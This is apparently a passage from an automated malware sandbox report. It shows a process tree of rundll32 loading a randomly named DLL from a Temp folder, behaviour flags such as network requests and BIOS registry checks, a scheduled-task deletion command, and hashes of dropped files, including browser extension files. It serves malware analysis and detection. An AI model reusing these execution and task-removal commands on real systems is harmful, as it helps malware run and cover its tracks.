C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\qMfgxxkvaFNxVGCk\gAXPDAAA\JlGFjJW.dll",#1 /Dhsite_idFAZ 5254031⤵PID:4272
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\qMfgxxkvaFNxVGCk\gAXPDAAA\JlGFjJW.dll",#1 /Dhsite_idFAZ 5254032⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:5032 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "oYgNoNeTxNTUFfDli"3⤵PID:4800
-
-
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" "C:\Windows\SYSTEM32\EDGEHTML.dll",#141 Microsoft.VCLibs.140.00_8wekyb3d8bbwe1⤵PID:2536
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k UnistackSvcGroup1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1256
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD590085423695672d3f9716361ecaa16f5
SHA1b7ef7246d6492a9c95127c940c6dafbc8db4338b
SHA256e4722bdafff4611fbe28450f20a9c7532794dca166dff1855be7f10bd210bb38
SHA512add92de3683fe97f3a0cfb7df2f08b1e3b4f1801fc1458856448373aa287d43b63ee103a6765d05c497a00380defcb227d1f4c056966dd0abd68b3e1c93ec960
-
Filesize
2KB
MD5ccc713e573a9e3a0b3964265df5abdd5
SHA1924604b83e0833904a8308911bdc3990d00aceeb
SHA25639f18fc1dd8cae15fe8abf5d843ed7836a27ddeaa1cfba0af88a5a0ee74a7535
SHA5121934c3de2dd57a096391de44976260c9c0501ad428ede3e0ce3977ec8ff0bd91a0e8b0b822acc7f8782d783f9f4007088c6a658b1df6110bb7569dfd18e41b05
-
Filesize
2KB
MD5a2c3fe6693d2a37fb3bb88cee0dbc5f1
SHA141c0eee63c71c4865c43835f461f9bae371aa955
SHA256fc2f0550601e5d966a7666bd7bced990ba8ad2d2be0291775b164a5ac3407eaf
SHA512810cc1ae49cd9f39e23cba2598747a61b69833737aa9dccd3634c410b79dbb46f99d63249227097c7202232984415f8d6ab3fe799af5dd82b468e1385bc7e7ea
-
Filesize
2KB
MD530ffcda5adcf7f1f9391fc55f78c47cd
SHA13e814aa13cb6aa80fbc298738a5774bae25c3184
SHA25612e8656f8cecc11647552598b3ebb05443c17f0f8f9b257b23a26e60b6949875
SHA512de124bfd259c5511561623307eed824c6e9c7aae21acff34963c4c733b4f0861e3904490c68d063fb12ceebc526a8534a7d95619b2a76e5f4948be55b9895300
-
Filesize
1.2MB
MD532ffd18dc6ca7a74486365506bdf474a
SHA16df843c244896004e390540722186e08cf2676e3
SHA2561b12e7d52c1d61c96e59c8f59b8ce1b066225af4a4ebf86837c1a0f7b8a8b874
SHA5128983bbca74b7d3d261f90afc1b1f4544d9d1daa0b7705980ea17f08cd6242cf770ec7d16d5948a46a1bdad50953b9edb17d493d9431b2d7ee2d0770a896a325a
-
Filesize
2KB
MD57c7f64e1be4bf5186df83fbdd26afada
SHA16ccae2a23b9d3f74d39e5e02b0da8de01871bf6b
SHA2561d1d6e21a1eb511dd13bed78469e5442d2531edbd41efc85ffecad4bcf0152cb
SHA512560db796cde269a3e2c4a4ab9d868309ac804055f9fbb726cd9889e10f5cb786673a1659ebef2b3fc093fb3a02bf65eab7dff8da711c15dd1994a43a3d797790
-
Filesize
16KB
MD53a28087852f6510192e8d2cbaa98c28f
SHA116b3a5d0eea3a0bdf8553ddb167abcb9bbaca844
SHA2564e15ebdb47a3dbdb03d401afc0b2e0023c519b592cd20dcfccc3e95c5851a826
SHA512490ec76406b111f696865c742477a82c34ca4d6b44ae2c2c36dfea3d0a6a30bcd6e53a234726c1a410b24cc5fea01382364bb6cd8eaf2128f9413d08d52d68ec
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\en_GB\messages.json
Filesize187B
MD52a1e12a4811892d95962998e184399d8
SHA155b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA25632b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\fa\messages.json
Filesize136B
MD5238d2612f510ea51d0d3eaa09e7136b1
SHA10953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA5122630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\pt_BR\messages.json
Filesize150B
MD50b1cf3deab325f8987f2ee31c6afc8ea
SHA16a51537cef82143d3d768759b21598542d683904
SHA2560ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA5125bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f
-
Filesize
10KB
MD58e0dac369d708b8e553c64e5d046627c
SHA1814a50c11416426fe975175886868b9063616d2d
SHA2568dda3d75ac6812e3330267cbe2aca44057945b9b575c2a04836aeb1ac8c84eb8
SHA512f718f4f030e2eee7efb346aedf8028ffd80b67314d3efbc4089d6db673a7737a1ff521730726e34a6d772d45ddcccca5059e5ac090bb352251c238fbd5c20659
-
Filesize
2KB
MD524cd57a8710ead89af77751cc4ce3236
SHA1d66a76341ec9d1f53adc3caedfbc2a78e1055a30
SHA256ca494d00a7aba63fc4cf7c49316bccee057616a26b917f9f12692b36b1f1dd91
SHA512903577e4d3cd91d47dbd9f4f49c48236aef013c12ed36dc8a338c23845680b709af7e5272c21f036ea88c7b6ca10d090eb2cede1d836557d8ea37d071358223f
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\abgdohlnibdejcajjfmngebmdanjldcc\1.2_0\_locales\es\messages.json
Filesize151B
MD5bd6b60b18aee6aaeb83b35c68fb48d88
SHA19b977a5fbf606d1104894e025e51ac28b56137c3
SHA256b7b119625387857b257dd3f4b20238cdbe6c25808a427f0110bcb0bf86729e55
SHA5123500b42b17142cd222bc4aa55bf32d719dbd5715ff8d0924f1d75aec4bc6aa8e9ca8435f0b831c73a65cc1593552b9037489294fbf677ba4e1cec1173853e45b
-
Filesize
9KB
MD5cc5a245c6d5a30bc632bb75f8c2abfea
SHA1c0b56e4bde3b3bf71b444a9d17283d887073cbbb
SHA256ea22aed97272ade576523a30561e56a5b2879aadc1513edf9874f4e91f4e8c80
SHA5122ed27d6ec890351c05d5472f764a4183f867ab5e9c7ad642077ff2a4c36bd6900a5fce1e996d620a89b04efe89f2e046692cdbfcff90d44fb1d15a06b450aaa2
-
Filesize
64B
MD53ca1082427d7b2cd417d7c0b7fd95e4e
SHA1b0482ff5b58ffff4f5242d77330b064190f269d3
SHA25631f15dc6986680b158468bf0b4a1c00982b07b2889f360befd8a466113940d8f
SHA512bbcfd8ea1e815524fda500b187483539be4a8865939f24c6e713f0a3bd90b69b4367c36aa2b09886b2006b685f81f0a77eec23ab58b7e2fb75304b412deb6ca3
-
Filesize
6.1MB
MD558b3e4f87f1aa519b666596e7cf0a592
SHA1a861d11cb4552bdf993c3a69f7fca5610140fe14
SHA2560b06b2799c26a15818bae6173da36fd86f122639a3f66a18dadbaefc7c845a5c
SHA5127ad1d36e37e31e7f240e36bf9ac9e76c1bc2646aeb7f610cf94d34fbf96e05bec3bcebb3bcdaf25a29d289cf83b71cb75c759117a41e88e862377537360216f1
-
Filesize
6.1MB
MD558b3e4f87f1aa519b666596e7cf0a592
SHA1a861d11cb4552bdf993c3a69f7fca5610140fe14
SHA2560b06b2799c26a15818bae6173da36fd86f122639a3f66a18dadbaefc7c845a5c
SHA5127ad1d36e37e31e7f240e36bf9ac9e76c1bc2646aeb7f610cf94d34fbf96e05bec3bcebb3bcdaf25a29d289cf83b71cb75c759117a41e88e862377537360216f1
-
Filesize
7.0MB
MD5a52dabfd55a6a04633ac83693b0a4177
SHA1184c0c38f9ae941f2adbf47ef1f3be362926ad22
SHA256bd637071d3d05a774893ec7643e9c4ebcd7c0628bdee233f1c2a6f0aabc7bcfe
SHA5125de6514dbc7f8bd58a902d6599c5f2f2650fe7fb1a0ce444f718d70abc639c0f9c9883ea8c79aa6bfe48f83c9dfe5d1c50fc130b485d212c6c7ce9b2287e3b12
-
Filesize
7.0MB
MD5a52dabfd55a6a04633ac83693b0a4177
SHA1184c0c38f9ae941f2adbf47ef1f3be362926ad22
SHA256bd637071d3d05a774893ec7643e9c4ebcd7c0628bdee233f1c2a6f0aabc7bcfe
SHA5125de6514dbc7f8bd58a902d6599c5f2f2650fe7fb1a0ce444f718d70abc639c0f9c9883ea8c79aa6bfe48f83c9dfe5d1c50fc130b485d212c6c7ce9b2287e3b12
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
7.0MB
MD5a52dabfd55a6a04633ac83693b0a4177
SHA1184c0c38f9ae941f2adbf47ef1f3be362926ad22
SHA256bd637071d3d05a774893ec7643e9c4ebcd7c0628bdee233f1c2a6f0aabc7bcfe
SHA5125de6514dbc7f8bd58a902d6599c5f2f2650fe7fb1a0ce444f718d70abc639c0f9c9883ea8c79aa6bfe48f83c9dfe5d1c50fc130b485d212c6c7ce9b2287e3b12
-
Filesize
7.0MB
MD5a52dabfd55a6a04633ac83693b0a4177
SHA1184c0c38f9ae941f2adbf47ef1f3be362926ad22
SHA256bd637071d3d05a774893ec7643e9c4ebcd7c0628bdee233f1c2a6f0aabc7bcfe
SHA5125de6514dbc7f8bd58a902d6599c5f2f2650fe7fb1a0ce444f718d70abc639c0f9c9883ea8c79aa6bfe48f83c9dfe5d1c50fc130b485d212c6c7ce9b2287e3b12
-
Filesize
7KB
MD510e3087620fe67d476f034e313dc4559
SHA1e7bbb7cc099533a89374992f9ba2dbf76a6e89cd
SHA25695e6acdd1bf589894919394b1a9a709f45fc56d2c486fcc6ece7db7832d5eb1c
SHA5126c6b2cf9e3248021ca3c83bcc4484deb3c60fa744787253a404639dc147037fc49ff1de953cc35b8e14d6e9d6a8bd28058cfe171407d8e55ec51145343fb7190
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
Filesize1KB
MD533b19d75aa77114216dbc23f43b195e3
SHA136a6c3975e619e0c5232aa4f5b7dc1fec9525535
SHA256b23ced31b855e5a39c94afa1f9d55b023b8c40d4dc62143e0539c6916c12c9d2
SHA512676fa2fd34878b75e5899197fe6826bb5604541aa468804bc9835bd3acabed2e6759878a8f1358955413818a51456816e90f149133828575a416c2a74fc7d821
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize11KB
MD516e738c00609d220bc5df483795558c7
SHA1e0c741a2ec4c24e1a9b686df84fba487c48cba6d
SHA256dea1f14cc7d2d517cb61e601e6b63803e1992d0f81a96c1d7e1c97e7276b8ca2
SHA5121e274dadd2dd68bc5b6d152d07a98d614064a331c9df25dfa465c35c431685cb19295e9d3bf13ceb5b2b8072d33e6d97da97804a6ea1d92f40646c3c488dadb0
-
Filesize
6.1MB
MD5d05c5e84c729a0c666eecfe14c936e36
SHA1d34b7a17e1f20d68c2f50bfa7d3fcb9567272a0a
SHA2566e915747e036eae54ec8d6866c3238c881c66bce6021bd35a21d9a3ae207f33d
SHA512f2dd030f9359efde204f04777a0e066ea5dc0de575d1423fb6fb80a83edbbfae436369039dfcef2045758469e6674fdcaa761787828f5e81b070868b884eee4d
-
Filesize
6.1MB
MD5d05c5e84c729a0c666eecfe14c936e36
SHA1d34b7a17e1f20d68c2f50bfa7d3fcb9567272a0a
SHA2566e915747e036eae54ec8d6866c3238c881c66bce6021bd35a21d9a3ae207f33d
SHA512f2dd030f9359efde204f04777a0e066ea5dc0de575d1423fb6fb80a83edbbfae436369039dfcef2045758469e6674fdcaa761787828f5e81b070868b884eee4d
-
Filesize
7.0MB
MD5a52dabfd55a6a04633ac83693b0a4177
SHA1184c0c38f9ae941f2adbf47ef1f3be362926ad22
SHA256bd637071d3d05a774893ec7643e9c4ebcd7c0628bdee233f1c2a6f0aabc7bcfe
SHA5125de6514dbc7f8bd58a902d6599c5f2f2650fe7fb1a0ce444f718d70abc639c0f9c9883ea8c79aa6bfe48f83c9dfe5d1c50fc130b485d212c6c7ce9b2287e3b12
-
Filesize
7.0MB
MD5a52dabfd55a6a04633ac83693b0a4177
SHA1184c0c38f9ae941f2adbf47ef1f3be362926ad22
SHA256bd637071d3d05a774893ec7643e9c4ebcd7c0628bdee233f1c2a6f0aabc7bcfe
SHA5125de6514dbc7f8bd58a902d6599c5f2f2650fe7fb1a0ce444f718d70abc639c0f9c9883ea8c79aa6bfe48f83c9dfe5d1c50fc130b485d212c6c7ce9b2287e3b12
-
Filesize
7.0MB
MD5a52dabfd55a6a04633ac83693b0a4177
SHA1184c0c38f9ae941f2adbf47ef1f3be362926ad22
SHA256bd637071d3d05a774893ec7643e9c4ebcd7c0628bdee233f1c2a6f0aabc7bcfe
SHA5125de6514dbc7f8bd58a902d6599c5f2f2650fe7fb1a0ce444f718d70abc639c0f9c9883ea8c79aa6bfe48f83c9dfe5d1c50fc130b485d212c6c7ce9b2287e3b12
-
Filesize
6KB
MD5fa8fcb288e10bb509cdc3593d9066250
SHA17391a8ba45767ece645140acab1cd3a26e01bc99
SHA256ff2f87ba371e0f9c00374c174a5f9b523fbd01372a32ad8c1eb0b5f2168bd946
SHA5127646da224726820cf816761780263c0c722e101a6dfec475114b68688b6d08a611cb6db844e21f7b9e2af2552106000bda1abd4fc6cf53613cc7e446b0375e21
-
Filesize
268B
MD5a62ce44a33f1c05fc2d340ea0ca118a4
SHA11f03eb4716015528f3de7f7674532c1345b2717d
SHA2569f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a
SHA5129d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732